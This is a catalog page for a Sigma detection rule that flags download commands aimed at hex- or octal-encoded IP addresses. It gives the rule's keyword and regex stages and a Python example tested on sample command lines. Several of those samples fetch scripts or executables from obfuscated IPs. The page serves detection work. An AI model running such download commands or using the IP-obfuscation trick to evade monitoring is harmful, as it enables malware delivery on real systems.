
Obfuscated IP Download Activity

Severity: medium
Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
Source: upstream

Detects use of an encoded/obfuscated version of an IP address (hex, octal, ...) in a URL combined with a download command.

Event coverage

Provider            Event ID   Title
Sysmon              1          Process creation
Security-Auditing   4688       A new process has been created.

Stages and Predicates

Stage 1: selection_command

or:
CommandLine|contains: DownloadFile
CommandLine|contains: DownloadString
CommandLine|contains: Invoke-RestMethod
CommandLine|contains: Invoke-WebRequest
CommandLine|contains: 'curl '
CommandLine|contains: 'irm '
CommandLine|contains: 'iwr '
CommandLine|contains: 'wget '

Stage 2: 1 of selection_ip_1

or:
CommandLine|contains: ' 0x'
CommandLine|contains: .00x
CommandLine|contains: .0x
CommandLine|contains: '//0x'

Stage 3: 1 of selection_ip_2

or:
CommandLine|contains: '%2e'
CommandLine|contains: 'http://%'

Stage 4: 1 of selection_ip_3

or:
CommandLine|re: ' [0-7]{7,13}'
CommandLine|re: 'https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}'
CommandLine|re: 'https?://0[0-9]{1,11}'
CommandLine|re: 'https?://0[0-9]{3,11}'
CommandLine|re: 'https?://[0-9]{1,3}\.0[0-9]{3,7}'
CommandLine|re: 'https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}'

Stage 5: not 1 of filter_main_valid_ip

CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}'
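As an added example (not part of this catalog page or the upstream rule), the stages above expressed as a Python check run over constructed command lines; the way the stages combine (selection_command and any one of the selection_ip_* groups and not filter_main_valid_ip) is assumed here, since the page lists the stages without their condition.

```python
import re

# Substrings and regexes copied from the rule stages above.
SELECTION_COMMAND = ["DownloadFile", "DownloadString", "Invoke-RestMethod",
                     "Invoke-WebRequest", "curl ", "irm ", "iwr ", "wget "]
SELECTION_IP_1 = [" 0x", ".00x", ".0x", "//0x"]
SELECTION_IP_2 = ["%2e", "http://%"]
SELECTION_IP_3 = [
    r" [0-7]{7,13}",
    r"https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}",
    r"https?://0[0-9]{1,11}",
    r"https?://0[0-9]{3,11}",
    r"https?://[0-9]{1,3}\.0[0-9]{3,7}",
    r"https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}",
]
FILTER_VALID_IP = r"https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}"

def _contains_any(cmdline, needles):
    # Sigma 'contains' over a list is an OR and is case-insensitive.
    low = cmdline.lower()
    return any(n.lower() in low for n in needles)

def matches(cmdline):
    # Assumed condition (the page lists the stages without it):
    # selection_command and 1 of selection_ip_* and not filter_main_valid_ip
    if not _contains_any(cmdline, SELECTION_COMMAND):
        return False
    obfuscated = (_contains_any(cmdline, SELECTION_IP_1)
                  or _contains_any(cmdline, SELECTION_IP_2)
                  or any(re.search(p, cmdline) for p in SELECTION_IP_3))
    if not obfuscated:
        return False
    # A plain dotted-quad anywhere in the command line suppresses the alert.
    return re.search(FILTER_VALID_IP, cmdline) is None

# Constructed sample command lines (not real telemetry).
SAMPLES = [
    'powershell -c "iwr http://0x7f000001/a.ps1"',      # hex IP -> fires
    "wget http://0177.0.0.1/x",                          # octal octet -> fires
    "cmd /c curl http://10.0.0.5/update.exe -o u.exe",   # plain IP -> no hit
    'curl http://192.168.1.10/a.txt -H "X: 0x1"',        # valid IP filter wins
]

def hits(samples=SAMPLES):
    return [s for s in samples if matches(s)]

if __name__ == "__main__":
    for line in hits():
        print("ALERT:", line)
```

The last sample shows the filter's effect: the " 0x" substring alone would trigger selection_ip_1, but the presence of a well-formed dotted-quad URL suppresses the alert.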

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely used, community-vetted indicators. A blank or 1 means the indicator is specific to this rule.

Field         Kind          Values
CommandLine   match
  • 0x corpus 2 (sigma 2)
  • %2e corpus 2 (sigma 2)
  • .00x corpus 2 (sigma 2)
  • .0x corpus 2 (sigma 2)
  • //0x corpus 2 (sigma 2)
  • DownloadFile corpus 2 (sigma 2)
  • DownloadString corpus 5 (sigma 5)
  • Invoke-RestMethod corpus 4 (sigma 4)
  • Invoke-WebRequest corpus 6 (sigma 6)
  • curl corpus 8 (sigma 8)
  • http://% corpus 2 (sigma 2)
  • irm corpus 3 (sigma 3)
  • iwr corpus 8 (sigma 8)
  • wget corpus 7 (sigma 7)
CommandLine   regex_match
  • [0-7]{7,13} corpus 2 (sigma 2)
  • https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} corpus 2 (sigma 2)
  • https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} corpus 2 (sigma 2)
  • https?://0[0-9]{1,11} corpus 2 (sigma 2)
  • https?://0[0-9]{3,11} corpus 2 (sigma 2)
  • https?://[0-9]{1,3}\.0[0-9]{3,7} corpus 2 (sigma 2)
  • https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} corpus 2 (sigma 2)